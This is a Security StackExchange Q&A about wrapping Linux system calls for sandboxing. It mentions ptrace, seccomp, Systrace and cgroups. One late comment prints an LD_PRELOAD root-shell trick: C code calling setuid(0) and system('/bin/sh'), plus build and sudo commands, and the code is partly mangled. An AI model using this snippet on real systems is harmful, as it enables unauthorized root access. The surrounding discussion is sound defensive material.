Wrapping system call (in reliable and secure way)

Question

It there reliable method of "wrapping" system calls under Linux ? (Like LD_PRELOAD for wrapping shared library function calls.)

Is there reliable, secure method of "wrapping" system calls (and, maybe receiving signals), that process can not break (assuming proper Linux implementation) ?

[Similar, but different question about "monitoring" system call](http://security.stackexchange.com/questions/8485/monitoring-system-calls-and-signals) — Grzegorz Wierzowiecki, Oct 29 '11 at 11:08

score 5 · Answer 1 · answered Oct 30 '11 at 01:25

5

Yes. You use system call interposition. One portable method is to use ptrace, though this can introduce a non-trivial performance overhead as it forces a context switch on every system call. On Solaris, you can use /proc; /proc lets you specify the subset of system calls that you are interested in wrapping, which lets you achieve better performance at the cost of compatibility.

Take a look at Plash, Systrace, and Subterfugue, to see some worked systems that use these sorts of methods. Also look at Chrome's sandbox, which uses a variety of mechanisms (including seccomp on Linux).

answered Oct 30 '11 at 01:25

D.W.

98,420
30
267
572

1

Thanks, your tips sounds interesting. I knew some of them, I'd like to add about [PinkTrace](http://dev.exherbo.org/~alip/pinktrace/) - I've found it interesting programming library. What is missing puzzle to me in all those solutions : how to change brk calls in NOP, and reserve proper amount of memory before it is run. – Grzegorz Wierzowiecki Nov 11 '11 at 22:45
1

Thanks for info about Solaris /proc. I haven't knew about this feaure. :) – Grzegorz Wierzowiecki Nov 11 '11 at 22:46

score 2 · Answer 2 · answered Oct 30 '11 at 17:10

2

I would use one of the many virtualization technologies available. If you only want to restrict what resources are available to a particular process, a jail mechanism such as cgroups should be enough. For more fine-tuning of what happens when the process executes a system call, check out User Mode Linux.

answered Oct 30 '11 at 17:10

Gilles 'SO- stop being evil'

50,912
13
120
179

You can still generate a C program shell.c in /temp which would make your wrapper somewhat useless `#include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/sh"); }` And when compiled it to generate a shared object with .so extension and likewise .dll file in Windows operating system. afterward you can gain root `gcc -fPIC -shared -o shell.so shell.c -nostartfiles ls -al shell.so sudo LD_PRELOAD=/tmp/shell.so find whoami > root` – Boschko Jan 22 '19 at 14:39
@Boschko What wrapper are you talking about??? – Gilles 'SO- stop being evil' Jan 22 '19 at 17:02

Wrapping system call (in reliable and secure way)

2 Answers2

Linked